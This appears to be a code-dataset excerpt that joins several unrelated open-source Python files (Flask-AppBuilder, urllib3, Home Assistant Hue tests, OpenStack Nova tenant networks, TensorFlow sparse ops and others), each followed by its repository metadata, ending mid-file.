self.obj = obj
def _get_attr_value(self, item, col):
if not hasattr(item, col):
# it's an inner obj attr
return reduce(getattr, col.split('.'), item)
if hasattr(getattr(item, col), '__call__'):
# its a function
return getattr(item, col)()
else:
# its attribute
return getattr(item, col)
def get_filters(self, search_columns=None):
search_columns = search_columns or []
return Filters(self.filter_converter_class, self, search_columns)
def get_values_item(self, item, show_columns):
return [self._get_attr_value(item, col) for col in show_columns]
def _get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
retlst = []
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
retlst.append(retdict)
return retlst
def get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
yield retdict
def get_values_json(self, lst, list_columns):
"""
Converts list of objects from query to JSON
"""
result = []
for item in self.get_values(lst, list_columns):
for key, value in list(item.items()):
if isinstance(value, datetime.datetime) or isinstance(value, datetime.date):
value = value.isoformat()
item[key] = value
if isinstance(value, list):
item[key] = [str(v) for v in value]
result.append(item)
return result
"""
Returns the models class name
useful for auto title on views
"""
@property
def model_name(self):
return self.obj.__class__.__name__
"""
Next methods must be overridden
"""
def query(self, filters=None, order_column='', order_direction='',
page=None, page_size=None):
pass
def is_image(self, col_name):
return False
def is_file(self, col_name):
return False
def is_gridfs_file(self, col_name):
return False
def is_gridfs_image(self, col_name):
return False
def is_string(self, col_name):
return False
def is_text(self, col_name):
return False
def is_integer(self, col_name):
return False
def is_float(self, col_name):
return False
def is_boolean(self, col_name):
return False
def is_date(self, col_name):
return False
def is_datetime(self, col_name):
return False
def is_relation(self, prop):
return False
def is_relation_col(self, col):
return False
def is_relation_many_to_one(self, prop):
return False
def is_relation_many_to_many(self, prop):
return False
def is_relation_one_to_one(self, prop):
return False
def is_relation_one_to_many(self, prop):
return False
def is_nullable(self, col_name):
return True
def is_unique(self, col_name):
return False
def is_pk(self, col_name):
return False
def is_fk(self, col_name):
return False
def get_max_length(self, col_name):
return -1
def get_min_length(self, col_name):
return -1
"""
-----------------------------------------
FUNCTIONS FOR CRUD OPERATIONS
-----------------------------------------
"""
def add(self, item):
"""
Adds object
"""
raise NotImplementedError
def edit(self, item):
"""
Edit (change) object
"""
raise NotImplementedError
def delete(self, item):
"""
Deletes object
"""
raise NotImplementedError
def get_col_default(self, col_name):
pass
def get_keys(self, lst):
"""
return a list of pk values from object list
"""
pk_name = self.get_pk_name()
return [getattr(item, pk_name) for item in lst]
def get_pk_name(self, item):
"""
Returns the primary key name
"""
raise NotImplementedError
def get_pk_value(self, item):
return getattr(item, self.get_pk_name())
def get(self, pk):
"""
return the record from key
"""
pass
def get_related_model(self, prop):
raise NotImplementedError
def get_related_interface(self, col_name):
"""
Returns a BaseInterface for the related model
of column name.
:param col_name: Column name with relation
:return: BaseInterface
"""
raise NotImplementedError
def get_related_obj(self, col_name, value):
raise NotImplementedError
def get_related_fk(self, model):
raise NotImplementedError
def get_columns_list(self):
"""
Returns a list of all the columns names
"""
return []
def get_user_columns_list(self):
"""
Returns a list of user viewable columns names
"""
return self.get_columns_list()
def get_search_columns_list(self):
"""
Returns a list of searchable columns names
"""
return []
def get_order_columns_list(self, list_columns=None):
"""
Returns a list of order columns names
"""
return []
def get_relation_fk(self, prop):
pass
|
rpiotti/Flask-AppBuilder
|
flask_appbuilder/models/base.py
|
Python
|
bsd-3-clause
| 7,479
| 0.00107
|
"""
@file sumoConfigGen.py
@author Craig Rafter
@date 29/01/2016
Code to generate a config file for a SUMO model.
"""
def sumoConfigGen(modelname='simpleT', configFile='./models/simpleT.sumocfg',
exportPath='../', AVratio=0, stepSize=0.01,
run=0, port=8813):
configXML = open(configFile, 'w')
print >> configXML, """<configuration>
<input>
<net-file value="{model}.net.xml"/>
<route-files value="{model}.rou.xml"/>
<gui-settings-file value="gui-settings.cfg"/>
<game value="1"/>
<start value="1"/>
<!--additional-files value="{model}.det.xml"/-->
</input>
<output>
<!--<summary-output value="{expPath}summary{AVR:03d}_{Nrun:03d}.xml"/>-->
<!--tripinfo-output value="{expPath}tripinfo{AVR:03d}_{Nrun:03d}.xml"/-->
<!--<vehroute-output value="{expPath}vehroute{AVR:03d}_{Nrun:03d}.xml"/-->
<!--queue-output value="{expPath}queuedata{AVR:03d}_{Nrun:03d}.xml"/-->
</output>
<time>
<begin value="0"/>
<step-length value="{stepSz}"/>
</time>
<processing>
<!--TURN OFF TELEPORTING-->
<time-to-teleport value="-1"/>
</processing>
<report>
<no-step-log value="true"/>
<error-log value="logfile.txt"/>
</report>
<traci_server>
<remote-port value="{SUMOport}"/>
</traci_server>""".format(model=modelname, expPath=exportPath,
AVR=int(AVratio*100), stepSz=stepSize,
Nrun=run, SUMOport=port)
print >> configXML, "</configuration>"
configXML.close()
|
cbrafter/CrowdTLL
|
generalCode/sumoConfigGen.py
|
Python
|
gpl-3.0
| 1,642
| 0.001827
|
from __future__ import absolute_import
from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
|
la0rg/Genum
|
GenumCore/vendor/urllib3/util/request.py
|
Python
|
mit
| 2,180
| 0.000917
|
'''
Problem 2
@author: Kevin Ji
'''
def sum_even_fibonacci( max_value ):
# Initial two elements
prev_term = 1
cur_term = 2
temp_sum = 2
while cur_term < max_value:
next_term = prev_term + cur_term
prev_term = cur_term
cur_term = next_term
if cur_term % 2 == 0:
temp_sum += cur_term
return temp_sum
print( sum_even_fibonacci( 4000000 ) )
|
mc10/project-euler
|
problem_2.py
|
Python
|
mit
| 430
| 0.025701
|
"""Test Hue setup process."""
from unittest.mock import Mock
import pytest
from homeassistant import config_entries
from homeassistant.components import hue
from homeassistant.setup import async_setup_component
from tests.async_mock import AsyncMock, patch
from tests.common import MockConfigEntry
@pytest.fixture
def mock_bridge_setup():
"""Mock bridge setup."""
with patch.object(hue, "HueBridge") as mock_bridge:
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(bridgeid="mock-id")
yield mock_bridge.return_value
async def test_setup_with_no_config(hass):
"""Test that we do not discover anything or try to set up a bridge."""
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
# No flows started
assert len(hass.config_entries.flow.async_progress()) == 0
# No configs stored
assert hass.data[hue.DOMAIN] == {}
async def test_setup_defined_hosts_known_auth(hass):
"""Test we don't initiate a config entry if config bridge is known."""
MockConfigEntry(domain="hue", data={"host": "0.0.0.0"}).add_to_hass(hass)
with patch.object(hue, "async_setup_entry", return_value=True):
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: [
{
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
{hue.CONF_HOST: "1.1.1.1"},
]
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
"1.1.1.1": {hue.CONF_HOST: "1.1.1.1"},
}
async def test_setup_defined_hosts_no_known_auth(hass):
"""Test we initiate config entry if config bridge is not known."""
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
async def test_config_passed_to_config_entry(hass):
"""Test that configured options for a host are loaded via config entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
mock_registry = Mock()
with patch.object(hue, "HueBridge") as mock_bridge, patch(
"homeassistant.helpers.device_registry.async_get_registry",
return_value=mock_registry,
):
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(
mac="mock-mac",
bridgeid="mock-bridgeid",
modelid="mock-modelid",
swversion="mock-swversion",
)
# Can't set name via kwargs
mock_bridge.return_value.api.config.name = "mock-name"
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
assert len(mock_bridge.mock_calls) == 2
p_hass, p_entry = mock_bridge.mock_calls[0][1]
assert p_hass is hass
assert p_entry is entry
assert len(mock_registry.mock_calls) == 1
assert mock_registry.mock_calls[0][2] == {
"config_entry_id": entry.entry_id,
"connections": {("mac", "mock-mac")},
"identifiers": {("hue", "mock-bridgeid")},
"manufacturer": "Signify",
"name": "mock-name",
"model": "mock-modelid",
"sw_version": "mock-swversion",
}
async def test_unload_entry(hass, mock_bridge_setup):
"""Test being able to unload an entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert len(mock_bridge_setup.mock_calls) == 1
mock_bridge_setup.async_reset = AsyncMock(return_value=True)
assert await hue.async_unload_entry(hass, entry)
assert len(mock_bridge_setup.async_reset.mock_calls) == 1
assert hass.data[hue.DOMAIN] == {}
async def test_setting_unique_id(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_no_other(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id"
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_other_ignored(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
MockConfigEntry(
domain=hue.DOMAIN,
data={"host": "0.0.0.0"},
unique_id="mock-id",
source=config_entries.SOURCE_IGNORE,
).add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert entry.unique_id == "mock-id"
assert hass.config_entries.async_entries() == [entry]
async def test_fixing_unique_id_other_correct(hass, mock_bridge_setup):
"""Test we remove config entry if another one has correct ID."""
correct_entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="mock-id",
)
correct_entry.add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert hass.config_entries.async_entries() == [correct_entry]
async def test_security_vuln_check(hass):
"""Test that we report security vulnerabilities."""
assert await async_setup_component(hass, "persistent_notification", {})
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
config = Mock(bridgeid="", mac="", modelid="BSB002", swversion="1935144020")
config.name = "Hue"
with patch.object(
hue,
"HueBridge",
Mock(
return_value=Mock(
async_setup=AsyncMock(return_value=True), api=Mock(config=config)
)
),
):
assert await async_setup_component(hass, "hue", {})
await hass.async_block_till_done()
state = hass.states.get("persistent_notification.hue_hub_firmware")
assert state is not None
assert "CVE-2020-6007" in state.attributes["message"]
|
titilambert/home-assistant
|
tests/components/hue/test_init.py
|
Python
|
apache-2.0
| 8,339
| 0.00024
|
from django.views.generic.detail import DetailView
from django.shortcuts import render, redirect
from django.http import Http404
from aspc.folio.models import Page
class AttachedPageMixin(object):
def get_page(self):
try:
return Page.objects.get(slug=self.page_slug)
except Page.DoesNotExist:
return None
def get_context_data(self, **kwargs):
context = super(AttachedPageMixin, self).get_context_data(**kwargs)
context['page'] = self.get_page()
return context
def page_view(request, slug_path):
'''slug_path: ^(?P<slug_path>(?:[\w\-\d]+/)+)$ '''
slug_parts = slug_path.rstrip('/').split('/')
pages = Page.objects.exclude(managed=True)
for part in slug_parts:
try:
new_page = pages.get(slug=part)
except Page.DoesNotExist:
raise Http404
else:
pages = new_page.page_set.all()
return render(request, "folio/page.html", {
"title": new_page.title,
"body": new_page.body,
"page": new_page,
"active_section": new_page.path()[0].slug,
})
|
aspc/mainsite
|
aspc/folio/views.py
|
Python
|
mit
| 1,132
| 0.007951
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import netaddr.core as netexc
from oslo.config import cfg
import six
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
import nova.network
from nova.openstack.common import log as logging
from nova import quota
CONF = cfg.CONF
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('use_neutron_default_nets',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('neutron_default_tenant_id',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('quota_networks',
'nova.api.openstack.compute.contrib.os_tenant_networks')
ALIAS = 'os-tenant-networks'
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def network_dict(network):
# NOTE(danms): Here, network should be an object, which could have come
# from neutron and thus be missing most of the attributes. Providing a
# default to get() avoids trying to lazy-load missing attributes.
return {"id": network.get("uuid", None) or network.get("id", None),
"cidr": str(network.get("cidr", None)),
"label": network.get("label", None)}
class TenantNetworkController(wsgi.Controller):
def __init__(self, network_api=None):
self.network_api = nova.network.API()
self._default_networks = []
def _refresh_default_networks(self):
self._default_networks = []
if CONF.use_neutron_default_nets == "True":
try:
self._default_networks = self._get_default_networks()
except Exception:
LOG.exception(_LE("Failed to get default networks"))
def _get_default_networks(self):
project_id = CONF.neutron_default_tenant_id
ctx = nova_context.RequestContext(user_id=None,
project_id=project_id)
networks = {}
for n in self.network_api.get_all(ctx):
networks[n['id']] = n['label']
return [{'id': k, 'label': v} for k, v in networks.iteritems()]
@extensions.expected_errors(())
def index(self, req):
context = req.environ['nova.context']
authorize(context)
networks = list(self.network_api.get_all(context))
if not self._default_networks:
self._refresh_default_networks()
networks.extend(self._default_networks)
return {'networks': [network_dict(n) for n in networks]}
@extensions.expected_errors(404)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
network = self.network_api.get(context, id)
except exception.NetworkNotFound:
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
return {'network': network_dict(network)}
@extensions.expected_errors((403, 404, 409))
@wsgi.response(202)
def delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
reservation = None
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=-1)
except Exception:
reservation = None
LOG.exception(_LE("Failed to update usages deallocating "
"network."))
def _rollback_quota(reservation):
if CONF.enable_network_quota and reservation:
QUOTAS.rollback(context, reservation)
try:
self.network_api.delete(context, id)
except exception.PolicyNotAuthorized as e:
_rollback_quota(reservation)
raise exc.HTTPForbidden(explanation=six.text_type(e))
except exception.NetworkInUse as e:
_rollback_quota(reservation)
raise exc.HTTPConflict(explanation=e.format_message())
except exception.NetworkNotFound:
_rollback_quota(reservation)
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
if CONF.enable_network_quota and reservation:
QUOTAS.commit(context, reservation)
@extensions.expected_errors((400, 403, 503))
def create(self, req, body):
if not body:
_msg = _("Missing request body")
raise exc.HTTPBadRequest(explanation=_msg)
context = req.environ["nova.context"]
authorize(context)
network = body["network"]
keys = ["cidr", "cidr_v6", "ipam", "vlan_start", "network_size",
"num_networks"]
kwargs = {k: network.get(k) for k in keys}
label = network["label"]
if not (kwargs["cidr"] or kwargs["cidr_v6"]):
msg = _("No CIDR requested")
raise exc.HTTPBadRequest(explanation=msg)
if kwargs["cidr"]:
try:
net = netaddr.IPNetwork(kwargs["cidr"])
if net.size < 4:
msg = _("Requested network does not contain "
"enough (2+) usable hosts")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrFormatError:
msg = _("CIDR is malformed.")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrConversionError:
msg = _("Address could not be converted.")
raise exc.HTTPBadRequest(explanation=msg)
networks = []
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many networks.")
raise exc.HTTPBadRequest(explanation=msg)
try:
networks = self.network_api.create(context,
label=label, **kwargs)
if CONF.enable_network_quota:
QUOTAS.commit(context, reservation)
except exception.PolicyNotAuthorized as e:
raise exc.HTTPForbidden(explanation=six.text_type(e))
except Exception:
if CONF.enable_network_quota:
QUOTAS.rollback(context, reservation)
msg = _("Create networks failed")
LOG.exception(msg, extra=network)
raise exc.HTTPServiceUnavailable(explanation=msg)
return {"network": network_dict(networks[0])}
class TenantNetworks(extensions.V3APIExtensionBase):
"""Tenant-based Network Management Extension."""
name = "TenantNetworks"
alias = ALIAS
version = 1
def get_resources(self):
ext = extensions.ResourceExtension(ALIAS, TenantNetworkController())
return [ext]
def get_controller_extensions(self):
return []
def _sync_networks(context, project_id, session):
ctx = nova_context.RequestContext(user_id=None, project_id=project_id)
ctx = ctx.elevated()
networks = nova.network.api.API().get_all(ctx)
return dict(networks=len(networks))
if CONF.enable_network_quota:
QUOTAS.register_resource(quota.ReservableResource('networks',
_sync_networks,
'quota_networks'))
|
shakamunyi/nova
|
nova/api/openstack/compute/plugins/v3/tenant_networks.py
|
Python
|
apache-2.0
| 8,183
| 0.000122
|
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Geometry module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=g-import-not-at-top
from tensorflow_graphics.util.doc import _import_tfg_docs
if _import_tfg_docs():
from tensorflow_graphics.geometry import convolution
from tensorflow_graphics.geometry import deformation_energy
from tensorflow_graphics.geometry import representation
from tensorflow_graphics.geometry import transformation
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.geometry.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
|
tensorflow/graphics
|
tensorflow_graphics/geometry/__init__.py
|
Python
|
apache-2.0
| 1,274
| 0.005495
|
#!/bin/python2
# Script that replies to username mentions.
import time
import os
import cPickle
import sys
import traceback
import numpy
import sys
from PIL import Image
from urlparse import urlparse
import gabenizer
IMG = "http://i.4cdn.org/r9k/1463377581531.jpg"
def main():
image = gabenizer.process_image(sys.argv[1], './plugins/gabenizer/gabenface.png')
image.save("./plugins/gabenizer/whatfuck.png")
if __name__ == "__main__":
main()
|
rafa1231518/CommunityBot
|
plugins/gabenizer/mentions.py
|
Python
|
gpl-3.0
| 499
| 0.02004
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-short-docstring-punctuation
"""Sparse Tensor Representation. See the @{$python/sparse_ops} guide.
@@SparseTensor
@@SparseTensorValue
@@sparse_to_dense
@@sparse_tensor_to_dense
@@sparse_to_indicator
@@sparse_merge
@@sparse_concat
@@sparse_reorder
@@sparse_reshape
@@sparse_slice
@@sparse_split
@@sparse_retain
@@sparse_reset_shape
@@sparse_fill_empty_rows
@@sparse_transpose
@@sparse_reduce_max
@@sparse_reduce_max_sparse
@@sparse_reduce_sum
@@sparse_reduce_sum_sparse
@@sparse_add
@@sparse_softmax
@@sparse_tensor_dense_matmul
@@sparse_maximum
@@sparse_minimum
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numbers
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sparse_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_sparse_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
def _convert_to_sparse_tensor(sp_input):
"""Convert `sp_input` to `SparseTensor` and return it.
Args:
sp_input: `SparseTensor` or `SparseTensorValue`.
Returns:
`sp_input` converted to `SparseTensor`.
Raises:
ValueError: if `sp_input` is neither `SparseTensor` nor `SparseTensorValue`.
"""
if isinstance(sp_input, sparse_tensor.SparseTensorValue):
return sparse_tensor.SparseTensor.from_value(sp_input)
if not isinstance(sp_input, sparse_tensor.SparseTensor):
raise TypeError("Input must be a SparseTensor.")
return sp_input
def _convert_to_sparse_tensors(sp_inputs):
"""Convert `sp_inputs` to `SparseTensor` objects and return them.
Args:
sp_inputs: `list` or `tuple` of `SparseTensor` or `SparseTensorValue`
objects.
Returns:
`sp_inputs` converted to `SparseTensor` objects.
Raises:
ValueError: if any item in `sp_inputs` is neither `SparseTensor` nor
`SparseTensorValue`.
"""
if isinstance(sp_inputs, list):
return [_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs]
if isinstance(sp_inputs, tuple):
return (_convert_to_sparse_tensor(sp_input) for sp_input in sp_inputs)
raise TypeError("Inputs must be a list or tuple.")
# pylint: disable=protected-access
@tf_export("sparse_concat")
def sparse_concat(axis,
sp_inputs,
name=None,
expand_nonconcat_dim=False,
concat_dim=None):
"""Concatenates a list of `SparseTensor` along the specified dimension.
Concatenation is with respect to the dense versions of each sparse input.
It is assumed that each inputs is a `SparseTensor` whose elements are ordered
along increasing dimension number.
If expand_nonconcat_dim is False, all inputs' shapes must match, except for
the concat dimension. If expand_nonconcat_dim is True, then inputs' shapes are
allowed to vary among all inputs.
The `indices`, `values`, and `shapes` lists must have the same length.
If expand_nonconcat_dim is False, then the output shape is identical to the
inputs', except along the concat dimension, where it is the sum of the inputs'
sizes along that dimension.
If expand_nonconcat_dim is True, then the output shape along the non-concat
dimensions will be expand to be the largest among all inputs, and it is the
sum of the inputs sizes along the concat dimension.
The output elements will be resorted to preserve the sort order along
increasing dimension number.
This op runs in `O(M log M)` time, where `M` is the total number of non-empty
values across all inputs. This is due to the need for an internal sort in
order to concatenate efficiently across an arbitrary dimension.
For example, if `axis = 1` and the inputs are
sp_inputs[0]: shape = [2, 3]
[0, 2]: "a"
[1, 0]: "b"
[1, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
then the output will be
shape = [2, 7]
[0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[1, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b c ] [ ] [b c ]
Another example, if 'axis = 1' and the inputs are
sp_inputs[0]: shape = [3, 3]
[0, 2]: "a"
[1, 0]: "b"
[2, 1]: "c"
sp_inputs[1]: shape = [2, 4]
[0, 1]: "d"
[0, 2]: "e"
if expand_nonconcat_dim = False, this will result in an error. But if
expand_nonconcat_dim = True, this will result in:
shape = [3, 7]
[0, 2]: "a"
[0, 4]: "d"
[0, 5]: "e"
[1, 0]: "b"
[2, 1]: "c"
Graphically this is equivalent to doing
[ a] concat [ d e ] = [ a d e ]
[b ] [ ] [b ]
[ c ] [ c ]
Args:
axis: Dimension to concatenate along. Must be in range [-rank, rank),
where rank is the number of dimensions in each input `SparseTensor`.
sp_inputs: List of `SparseTensor` to concatenate.
name: A name prefix for the returned tensors (optional).
expand_nonconcat_dim: Whether to allow the expansion in the non-concat
dimensions. Defaulted to False.
concat_dim: The old (deprecated) name for axis.
Returns:
A `SparseTensor` with the concatenated output.
Raises:
TypeError: If `sp_inputs` is not a list of `SparseTensor`.
"""
axis = deprecation.deprecated_argument_lookup("axis", axis, "concat_dim",
concat_dim)
sp_inputs = _convert_to_sparse_tensors(sp_inputs)
if len(sp_inputs) == 1: # Degenerate case of one tensor.
return sp_inputs[0]
inds = [sp_input.indices for sp_input in sp_inputs]
vals = [sp_input.values for sp_input in sp_inputs]
shapes = [sp_input.dense_shape for sp_input in sp_inputs]
if expand_nonconcat_dim:
max_shape = math_ops.reduce_max(
array_ops.concat(
[array_ops.reshape(shape, [1, -1]) for shape in shapes], 0), 0)
shapes = [
array_ops.concat([
max_shape[:axis], shape[-1:]
if axis == -1 else shape[axis:axis + 1], []
if axis == -1 else max_shape[axis + 1:]
], 0) for shape in shapes
]
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_concat(inds, vals, shapes, axis, name=name))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_add")
def sparse_add(a, b, thresh=0):
"""Adds two tensors, at least one of each is a `SparseTensor`.
If one `SparseTensor` and one `Tensor` are passed in, returns a `Tensor`. If
both arguments are `SparseTensor`s, this returns a `SparseTensor`. The order
of arguments does not matter. Use vanilla `tf.add()` for adding two dense
`Tensor`s.
The shapes of the two operands must match: broadcasting is not supported.
The indices of any input `SparseTensor` are assumed ordered in standard
lexicographic order. If this is not the case, before this step run
`SparseReorder` to restore index ordering.
If both arguments are sparse, we perform "clipping" as follows. By default,
if two values sum to zero at some index, the output `SparseTensor` would still
include that particular location in its index, storing a zero in the
corresponding value slot. To override this, callers can specify `thresh`,
indicating that if the sum has a magnitude strictly smaller than `thresh`, its
corresponding value and index would then not be included. In particular,
`thresh == 0.0` (default) means everything is kept and actual thresholding
happens only for a positive value.
For example, suppose the logical sum of two sparse operands is (densified):
[ 2]
[.1 0]
[ 6 -.2]
Then,
* `thresh == 0` (the default): all 5 index/value pairs will be returned.
* `thresh == 0.11`: only .1 and 0 will vanish, and the remaining three
index/value pairs will be returned.
* `thresh == 0.21`: .1, 0, and -.2 will vanish.
Args:
a: The first operand; `SparseTensor` or `Tensor`.
b: The second operand; `SparseTensor` or `Tensor`. At least one operand
must be sparse.
thresh: A 0-D `Tensor`. The magnitude threshold that determines if an
output value/index pair takes space. Its dtype should match that of the
values if they are real; if the latter are complex64/complex128, then the
dtype should be float32/float64, correspondingly.
Returns:
A `SparseTensor` or a `Tensor`, representing the sum.
Raises:
TypeError: If both `a` and `b` are `Tensor`s. Use `tf.add()` instead.
"""
